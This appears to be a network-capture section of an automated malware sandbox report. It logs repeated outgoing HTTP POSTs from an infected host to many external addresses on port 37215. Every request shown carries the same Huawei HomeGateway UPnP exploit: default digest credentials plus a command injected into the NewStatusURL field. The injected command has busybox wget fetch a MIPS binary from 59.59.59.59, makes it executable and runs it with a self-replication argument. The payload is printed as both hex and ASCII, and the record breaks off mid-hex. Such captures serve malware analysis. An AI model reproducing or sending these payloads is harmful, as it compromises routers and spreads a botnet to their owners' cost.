                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1757192.168.2.1543200157.232.122.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.926686049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1758192.168.2.155060641.84.15.12637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.926722050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1759192.168.2.154753641.161.81.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.926873922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1760192.168.2.1537416197.152.255.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.927047014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1761192.168.2.1554114197.160.241.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.927129984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1762192.168.2.1553242157.119.106.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.937772036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1763192.168.2.1545626157.25.232.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.937813044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1764192.168.2.1541102197.209.158.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.943017960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1765192.168.2.15601061.108.233.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999003887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1766192.168.2.1536624197.6.19.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.999036074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 